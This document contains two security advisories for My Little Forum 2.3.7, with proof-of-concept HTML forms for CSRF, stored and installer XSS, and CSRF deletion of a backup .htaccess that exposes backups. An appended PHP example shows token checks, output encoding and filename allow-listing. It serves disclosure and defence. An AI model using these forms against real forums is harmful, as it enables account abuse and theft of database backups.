My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting
Posted on 02 November 2016
Title:
======
My Little Forum 2.3.7 - Multiple Vulnerabilities

Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). It is Open Source licensed under the GNU General Public License. The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL.

Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip

Vulnerability Type:
=========================
Cross-Site Request Forgery
Stored Cross-Site Scripting
CSRF Allowing Backup Disclosure

Vulnerability Details:
==============================
This web application suffers from several vulnerabilities.

Severity Level:
===============
High

Proof of Concept (PoC):
=======================
1. CSRF (Add Page)
With this exploit, a page can be added to the web application.

<form action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" method="post" accept-charset="utf-8">
  <input type="hidden" name="mode" value="admin">
  <input type="hidden" name="title" value="Title">
  <input type="hidden" name="content" value="Content">
  <input type="hidden" name="menu_linkname" value="Name">
  <input type="submit" name="edit_page_submit" value="OK - Save page">
</form>

2. Stored XSS:

<form action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" method="post" accept-charset="utf-8">
  <input type="hidden" name="mode" value="admin">
  <input type="hidden" name="title" value="Stored XSS <script>alert(1)</script>">
  <input type="hidden" name="content" value="Stored XSS <script>alert(2)</script>">
  <input type="hidden" name="menu_linkname" value="Stored XSS <script>alert(3)</script>">
  <input type="submit" name="edit_page_submit" value="OK - Save page">
</form>

3. Backup Disclosure:
With this exploit, the .htaccess file in the backup folder can be deleted, giving access to the backups.

<form action="http://localhost/mylittleforum-master/index.php" method="post" accept-charset="utf-8">
  <div>
    <input type="hidden" name="mode" value="admin">
    <input type="hidden" name="delete_backup_files[]" value=".htaccess">
    <input type="submit" name="delete_backup_files_confirm" value="OK - Delete">
  </div>
</form>

After using the exploit, go to: http://localhost/mylittleforum-master/backup/

Author:
==================
Ashiyane Digital Security Team

=======================

Title:
======
My Little Forum 2.3.7 (Installer) - Cross-Site Scripting

Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). It is Open Source licensed under the GNU General Public License. The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL.

Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip

Vulnerability Type:
=========================
Cross-Site Scripting

Vulnerability Details:
==============================
The installer of My Little Forum is vulnerable to cross-site scripting.
Proof of Concept (PoC):
=======================
<html>
<body>
<form action="http://localhost/mylittleforum-master/install/index.php" method="post">
  <input type="text" name="forum_name" value='"><script>alert(1)</script>'>
  <input type="text" name="forum_address" value='"><script>alert(2)</script>'>
  <input type="text" name="forum_email" value='"><script>alert(3)</script>'>
  <input type="text" name="admin_name" value='"><script>alert(4)</script>'>
  <input type="text" name="admin_email" value='"><script>alert(5)</script>'>
  <input type="text" name="host" value='"><script>alert(6)</script>'>
  <input type="text" name="database" value='"><script>alert(7)</script>'>
  <input type="text" name="user" value='"><script>alert(8)</script>'>
  <input type="text" name="table_prefix" value='"><script>alert(9)</script>'>
  <input type="submit" name="install_submit" value="OK - Install forum">
  <input type="hidden" name="language_file" value="english.lang">
</form>
</body>
</html>

Author:
==================
Ashiyane Digital Security Team
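
Defensive counterpart to the PoCs in both advisories, added here as an example; it is not part of the original advisory and not My Little Forum's own code. It shows a per-session anti-CSRF token check, HTML output encoding, and a filename allow-list for backup deletion. The function names, the csrf_token field and the "sql" backup extension are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Hypothetical helpers (names are illustrative); not My Little Forum's own code.

/** Issue or reuse a per-session token to embed as a hidden field in admin forms. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Accept a state-changing POST only if it carries the session's token. */
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== '' && hash_equals($expected, $supplied);
}

/** Encode stored values (title, content, menu_linkname) for HTML output. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Keep only plain backup file names; dotfiles and paths are dropped. */
function deletable_backups(array $requested, string $ext = 'sql'): array
{
    $pattern = '/\A[A-Za-z0-9][A-Za-z0-9._-]*\.' . preg_quote($ext, '/') . '\z/';
    return array_values(array_filter(
        $requested,
        fn($name) => is_string($name) && preg_match($pattern, $name) === 1
    ));
}

// Constructed requests reusing the field names from the PoC forms.
$session = [];  // stands in for $_SESSION
$token   = csrf_token($session);
$forged  = ['mode' => 'admin', 'title' => 'Stored XSS <script>alert(1)</script>'];
$genuine = $forged + ['csrf_token' => $token];

var_dump(csrf_valid($session, $forged));   // cross-site form: no token
var_dump(csrf_valid($session, $genuine));  // form rendered by the application
echo h($genuine['title']), "\n";           // encoded before it reaches the page
print_r(deletable_backups(['.htaccess', '../index.php', 'backup_2016.sql']));
```

The same encoding helper applies to the installer fields in the second advisory, since each value is echoed back inside an HTML attribute.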